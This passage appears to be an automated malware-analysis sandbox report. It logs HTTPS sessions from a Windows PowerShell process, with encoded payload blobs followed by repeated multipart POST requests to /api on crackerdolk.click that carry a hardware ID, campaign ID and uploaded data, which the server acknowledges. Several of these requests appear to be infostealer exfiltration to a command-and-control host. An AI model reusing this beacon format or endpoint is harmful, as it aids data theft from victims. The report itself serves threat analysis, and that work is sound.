                                                                                      Data Ascii: mliXavD8GYSn2sbuTX4l3FO3/zKlva4fVmkO0CP+/YTanEetYnjNBaYIU7zfL/FeFiWqYy5/Z9gSbAmB5ez4ltgeF3szeopHJwjS/Yz9Yt5Rtv0w5Tjvn5fqT9Mmv32H2twFb+HqWhVlDMDoXzEiHBA1eeMgb+vMFWucB/I8fUbaHgRv4XoKhuULkrxNOOEe0jX/8Of9bN1VqU0QYe9tVtgbF3szcYBINEKebkjv5w/R9qxlN79tXxarTZOhPfy
                                                                                      2024-12-29 08:25:10 UTC1369INData Raw: 61 77 6a 75 30 6a 47 70 49 71 52 65 73 37 2b 4a 64 78 54 64 6e 35 78 4a 66 77 73 6e 56 66 70 44 78 4e 69 66 72 31 46 57 38 30 55 2f 53 4b 38 57 5a 4e 30 77 70 54 34 69 37 6e 69 46 35 4e 32 62 48 54 30 4f 6a 32 64 31 37 69 61 41 65 42 37 2f 38 57 64 58 30 61 75 6f 4c 71 4e 42 53 65 49 46 48 2b 4d 2f 57 43 63 30 62 5a 39 38 32 62 2b 37 70 33 56 36 6b 2f 53 38 69 7a 75 78 78 2f 4e 45 58 30 6f 2b 49 31 41 70 41 6c 53 4f 38 6e 73 5a 6f 78 57 5a 62 32 77 4e 36 70 39 6e 4e 5a 71 54 52 48 68 50 33 2f 46 6d 64 6d 45 72 4f 4b 34 43 30 48 6d 53 78 45 38 6a 54 36 69 6e 6c 53 32 76 2f 65 6d 2b 4f 6b 4d 42 7a 69 4e 31 2f 49 70 62 73 74 59 47 51 4e 74 38 2f 59 4d 42 61 46 49 45 37 31 66 4f 37 4c 5a 67 44 52 2f 59 7a 47 73 62 42 2f 57 36 45 2f 52 6f 48 78 39 68 35 75 63
                                                                                      Data Ascii: awju0jGpIqRes7+JdxTdn5xJfwsnVfpDxNifr1FW80U/SK8WZN0wpT4i7niF5N2bHT0Oj2d17iaAeB7/8WdX0auoLqNBSeIFH+M/WCc0bZ982b+7p3V6k/S8izuxx/NEX0o+I1ApAlSO8nsZoxWZb2wN6p9nNZqTRHhP3/FmdmErOK4C0HmSxE8jT6inlS2v/em+OkMBziN1/IpbstYGQNt8/YMBaFIE71fO7LZgDR/YzGsbB/W6E/RoHx9h5uc
                                                                                      2024-12-29 08:25:10 UTC1369INData Raw: 69 4b 43 65 51 4d 41 50 6d 63 75 6a 46 65 45 79 57 71 59 79 64 39 72 56 78 57 4b 73 38 53 49 2f 35 36 52 46 67 5a 68 79 31 68 75 51 71 46 5a 34 6d 53 66 67 31 2f 49 6c 79 52 39 48 2b 79 64 36 2f 39 6e 64 4b 34 6d 67 48 71 66 44 77 46 7a 77 75 58 61 76 44 38 47 59 53 6e 32 73 62 75 54 7a 37 67 48 56 4e 31 66 37 50 6a 50 43 77 59 6c 4b 76 4f 6c 57 43 39 76 34 57 61 6e 6b 65 73 6f 76 69 4b 67 65 61 4b 30 44 79 66 4c 2f 46 65 46 69 57 71 59 79 39 35 71 42 36 56 61 34 6d 54 49 6e 2b 37 52 5a 33 4e 46 50 30 6e 4f 34 33 56 63 73 39 55 2b 34 37 37 73 74 6d 41 4e 48 39 6a 4d 61 78 73 48 6c 55 70 54 5a 4a 6d 76 6a 39 46 47 68 39 46 4c 43 46 36 69 59 52 6c 79 78 47 2b 6a 44 36 67 6e 78 50 30 76 6a 43 6c 2f 37 32 50 68 4b 6c 4b 41 66 51 76 64 6f 41 5a 48 67 51 39 4a
                                                                                      Data Ascii: iKCeQMAPmcujFeEyWqYyd9rVxWKs8SI/56RFgZhy1huQqFZ4mSfg1/IlyR9H+yd6/9ndK4mgHqfDwFzwuXavD8GYSn2sbuTz7gHVN1f7PjPCwYlKvOlWC9v4WankesoviKgeaK0DyfL/FeFiWqYy95qB6Va4mTIn+7RZ3NFP0nO43Vcs9U+477stmANH9jMaxsHlUpTZJmvj9FGh9FLCF6iYRlyxG+jD6gnxP0vjCl/72PhKlKAfQvdoAZHgQ9J
                                                                                      2024-12-29 08:25:10 UTC257INData Raw: 30 32 55 44 2f 69 53 78 33 54 39 67 33 65 66 4a 6d 65 66 30 52 56 47 73 50 6b 43 65 76 65 51 6b 4b 54 51 63 39 4e 58 51 50 31 57 46 61 78 75 72 63 72 47 58 50 78 69 57 74 73 2b 4d 34 37 42 7a 52 4b 46 33 65 62 62 61 37 52 46 67 5a 42 71 6a 67 71 6c 6f 56 5a 78 72 47 38 42 38 2b 49 4a 6b 55 63 44 38 33 4a 6d 78 69 54 34 53 75 6e 41 66 79 4d 6a 34 46 57 6c 7a 43 36 58 41 7a 6a 41 66 6c 44 74 45 37 6a 4f 78 79 7a 39 47 6c 71 6d 66 30 4c 47 79 59 52 4c 36 59 42 58 54 71 4b 68 4d 4e 79 59 43 2b 70 53 70 4d 46 58 4c 65 51 32 35 4c 72 48 64 50 77 66 56 34 39 36 59 38 71 42 7a 46 5a 77 4f 59 4a 4c 77 2f 51 78 32 53 69 4f 7a 6c 2b 51 67 41 6f 4a 6e 56 76 6f 79 2f 34 4a 70 41 4a 69 78 77 39 36 70 6a 7a 41 61 34 67 38 4a 79 4f 57 37 51 79 64 42 48 72 71 44 37 6a 41
                                                                                      Data Ascii: 02UD/iSx3T9g3efJmef0RVGsPkCeveQkKTQc9NXQP1WFaxurcrGXPxiWts+M47BzRKF3ebba7RFgZBqjgqloVZxrG8B8+IJkUcD83JmxiT4SunAfyMj4FWlzC6XAzjAflDtE7jOxyz9Glqmf0LGyYRL6YBXTqKhMNyYC+pSpMFXLeQ25LrHdPwfV496Y8qBzFZwOYJLw/Qx2SiOzl+QgAoJnVvoy/4JpAJixw96pjzAa4g8JyOW7QydBHrqD7jA
                                                                                      2024-12-29 08:25:10 UTC1369INData Raw: 33 31 66 64 0d 0a 45 33 67 78 5a 39 44 72 6d 6c 44 38 4f 6c 76 65 4d 78 71 48 34 4d 46 61 7a 63 42 2f 59 72 36 42 4f 4e 43 4e 4e 35 70 4b 6e 50 31 57 46 61 78 75 72 63 72 47 58 50 78 69 57 74 73 2b 4d 34 37 42 7a 52 4b 46 33 65 62 62 54 2f 42 31 69 63 77 33 32 6f 2b 49 79 45 74 4e 6c 41 2f 5a 38 71 62 77 2f 43 4a 62 4f 67 74 37 70 39 69 67 53 6c 7a 4e 4a 68 76 72 74 43 69 70 61 47 72 4b 49 37 6a 5a 58 76 53 42 58 2f 6e 79 2f 78 58 6b 41 6a 71 47 43 33 76 57 6e 4d 41 72 79 59 68 7a 64 72 71 78 4c 4e 57 74 54 72 63 33 2f 5a 6b 33 42 5a 51 50 72 66 4b 6e 46 4f 45 50 45 34 38 71 64 35 37 55 33 62 4a 77 7a 55 59 58 79 38 42 70 5a 53 6a 4f 35 6a 4f 6f 6f 56 36 49 39 54 75 6b 2f 39 49 4a 42 66 74 6a 32 32 4a 6e 2f 73 48 41 53 37 48 42 49 79 4b 58 43 57 79 38 30
                                                                                      Data Ascii: 31fdE3gxZ9DrmlD8OlveMxqH4MFazcB/Yr6BONCNN5pKnP1WFaxurcrGXPxiWts+M47BzRKF3ebbT/B1icw32o+IyEtNlA/Z8qbw/CJbOgt7p9igSlzNJhvrtCipaGrKI7jZXvSBX/ny/xXkAjqGC3vWnMAryYhzdrqxLNWtTrc3/Zk3BZQPrfKnFOEPE48qd57U3bJwzUYXy8BpZSjO5jOooV6I9Tuk/9IJBftj22Jn/sHAS7HBIyKXCWy80
                                                                                      2024-12-29 08:25:10 UTC1369INData Raw: 6c 30 54 73 5a 34 46 4b 6c 75 37 73 74 6d 41 4d 43 78 6c 4d 79 2f 39 6d 49 53 2b 6e 41 41 69 2b 2f 70 48 57 52 69 48 76 4f 7a 31 77 45 62 6c 43 70 56 36 54 48 39 70 48 78 52 33 4d 2f 79 69 2f 4b 34 66 6c 57 30 49 51 66 47 76 66 52 62 50 30 31 64 2f 4d 33 57 61 46 57 4c 61 78 75 35 43 66 4b 4c 63 55 66 41 34 49 47 35 2f 37 46 78 52 4c 49 39 53 36 6e 2b 36 68 45 6e 4f 6c 32 79 7a 62 46 30 57 39 4d 76 55 72 6c 6b 6f 64 63 6b 46 59 57 6d 6e 4d 7a 75 2b 47 6b 53 74 48 41 66 32 72 4f 37 43 53 63 73 58 66 4f 4f 2b 7a 51 54 6b 44 31 41 76 67 4c 50 6f 47 68 44 78 76 66 50 6f 4d 2b 64 66 46 53 6c 4b 6b 43 4f 32 39 74 62 4b 54 51 53 39 4e 58 51 5a 6c 33 54 46 41 32 35 4a 4c 48 64 50 33 58 56 2f 38 4b 5a 35 36 63 39 64 37 55 7a 56 34 37 2b 75 31 55 6e 63 6c 33 73 33
                                                                                      Data Ascii: l0TsZ4FKlu7stmAMCxlMy/9mIS+nAAi+/pHWRiHvOz1wEblCpV6TH9pHxR3M/yi/K4flW0IQfGvfRbP01d/M3WaFWLaxu5CfKLcUfA4IG5/7FxRLI9S6n+6hEnOl2yzbF0W9MvUrlkodckFYWmnMzu+GkStHAf2rO7CScsXfOO+zQTkD1AvgLPoGhDxvfPoM+dfFSlKkCO29tbKTQS9NXQZl3TFA25JLHdP3XV/8KZ56c9d7UzV47+u1Uncl3s3


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.549945104.21.80.14437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:11 UTC279OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=3E5I09CJ5Y2HCV
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 12810
                                                                                      Host: crackerdolk.click
                                                                                      2024-12-29 08:25:11 UTC12810OUTData Raw: 2d 2d 33 45 35 49 30 39 43 4a 35 59 32 48 43 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 33 45 35 49 30 39 43 4a 35 59 32 48 43 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 45 35 49 30 39 43 4a 35 59 32 48 43 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 33 45 35 49 30 39 43 4a 35
                                                                                      Data Ascii: --3E5I09CJ5Y2HCVContent-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--3E5I09CJ5Y2HCVContent-Disposition: form-data; name="pid"2--3E5I09CJ5Y2HCVContent-Disposition: form-data; name="lid"jMw1IE--bigJ--3E5I09CJ5
                                                                                      2024-12-29 08:25:13 UTC1142INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:25:12 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=cuh938h2qdiqjohf3f3m1504pm; expires=Thu, 24 Apr 2025 02:11:51 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woPvJ%2BTWuK0JedfymX2wE5yegOHMqFopKay2tVlsR4taHF4xZB0%2BirwFqMUbA5%2B4TazB%2F3AmUZ0eE%2Bq1reCluSCb60xD2Ib1Rq9gqVqoynNGRFXqHvIBOi%2BAFrrIMZmv%2FWV00A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f9865eaad277d0e-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1942&rtt_var=732&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13747&delivery_rate=1491317&cwnd=243&unsent_bytes=0&cid=9cc378f076a41cdf&ts=1150&x=0"
                                                                                      2024-12-29 08:25:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-29 08:25:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.549951104.21.80.14437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:14 UTC273OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=5P599PVX
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 15016
                                                                                      Host: crackerdolk.click
                                                                                      2024-12-29 08:25:14 UTC15016OUTData Raw: 2d 2d 35 50 35 39 39 50 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 35 50 35 39 39 50 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 50 35 39 39 50 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 35 50 35 39 39 50 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                      Data Ascii: --5P599PVXContent-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--5P599PVXContent-Disposition: form-data; name="pid"2--5P599PVXContent-Disposition: form-data; name="lid"jMw1IE--bigJ--5P599PVXContent-Dispositi
                                                                                      2024-12-29 08:25:15 UTC1139INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:25:15 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=ge7j12ij29gm2td3383a9f9qak; expires=Thu, 24 Apr 2025 02:11:53 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSLc4GL4Ob9HUST3SKg%2FmhSCuW6SZAjXLt0Qzgbju1I3EgCBNEFIAj3f6HHJ%2BPXzOv0f%2FikT4aDnccJnRqF54%2BnwMPs8%2FuM4j0X5a%2FfpCR58McE4Cu3UH4ifjORVFcOwx6HHkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f9865f9ca65c443-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=635&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15947&delivery_rate=1720683&cwnd=244&unsent_bytes=0&cid=73fc28d00f0c6522&ts=909&x=0"
                                                                                      2024-12-29 08:25:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-29 08:25:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.549957104.21.80.14437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:16 UTC275OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=DEXSTRMOAR
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 20518
                                                                                      Host: crackerdolk.click
                                                                                      2024-12-29 08:25:16 UTC15331OUTData Raw: 2d 2d 44 45 58 53 54 52 4d 4f 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 44 45 58 53 54 52 4d 4f 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 45 58 53 54 52 4d 4f 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 44 45 58 53 54 52 4d 4f 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                      Data Ascii: --DEXSTRMOARContent-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--DEXSTRMOARContent-Disposition: form-data; name="pid"3--DEXSTRMOARContent-Disposition: form-data; name="lid"jMw1IE--bigJ--DEXSTRMOARContent-D
                                                                                      2024-12-29 08:25:16 UTC5187OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60
                                                                                      Data Ascii: un 4F([:7s~X`nO`i`
                                                                                      2024-12-29 08:25:17 UTC1133INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:25:17 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=nbjlsukuk9fkqine4dk5o0qaea; expires=Thu, 24 Apr 2025 02:11:56 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dr63q4%2BSF1VSRjwkmlJPwFCCU%2BqDIJk1k1fJ9LEsgml1w8q9l0BYQUVgKOksrKsh8O%2FKRxEGVOx5Fl6zAqW7Bnifc30WTyR6gRwNsZxt0ASq3gcqrOKy4mE1IX9gpAuwjK0pXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f98660869497d0e-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1859&min_rtt=1850&rtt_var=712&sent=11&recv=27&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21473&delivery_rate=1516883&cwnd=243&unsent_bytes=0&cid=1223efd98e129319&ts=993&x=0"
                                                                                      2024-12-29 08:25:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-29 08:25:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.549965104.21.80.14437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:19 UTC276OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=SIAS21YXWH20
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1218
                                                                                      Host: crackerdolk.click
                                                                                      2024-12-29 08:25:19 UTC1218OUTData Raw: 2d 2d 53 49 41 53 32 31 59 58 57 48 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 53 49 41 53 32 31 59 58 57 48 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 49 41 53 32 31 59 58 57 48 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 53 49 41 53 32 31 59 58 57 48 32 30 0d 0a 43
                                                                                      Data Ascii: --SIAS21YXWH20Content-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--SIAS21YXWH20Content-Disposition: form-data; name="pid"1--SIAS21YXWH20Content-Disposition: form-data; name="lid"jMw1IE--bigJ--SIAS21YXWH20C
                                                                                      2024-12-29 08:25:20 UTC1142INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:25:19 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=94s6t1dg0e284og6p94efvmp12; expires=Thu, 24 Apr 2025 02:11:58 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YYQf5MsLHybmd5hF3kGYVpsBermd%2FauB3%2BT%2B2HO0ZRPalO1DAy9KZjF7G9zH3%2FUlrpT%2FL0SIeLhelSA2HLzivA37WO%2FT0HuSQtaghop28E%2F%2FfflSKD0Wt%2Bv4fc24ctr3H1IyNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f9866180ef642d2-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1585&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2130&delivery_rate=1828428&cwnd=227&unsent_bytes=0&cid=632efb6eaf301ba7&ts=861&x=0"
                                                                                      2024-12-29 08:25:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-29 08:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.549969104.21.80.14437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:21 UTC280OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=2LCF5MWZE75RL6K0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1099
                                                                                      Host: crackerdolk.click
                                                                                      2024-12-29 08:25:21 UTC1099OUTData Raw: 2d 2d 32 4c 43 46 35 4d 57 5a 45 37 35 52 4c 36 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 32 4c 43 46 35 4d 57 5a 45 37 35 52 4c 36 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4c 43 46 35 4d 57 5a 45 37 35 52 4c 36 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 32 4c 43
                                                                                      Data Ascii: --2LCF5MWZE75RL6K0Content-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--2LCF5MWZE75RL6K0Content-Disposition: form-data; name="pid"1--2LCF5MWZE75RL6K0Content-Disposition: form-data; name="lid"jMw1IE--bigJ--2LC
                                                                                      2024-12-29 08:25:22 UTC1129INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:25:22 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
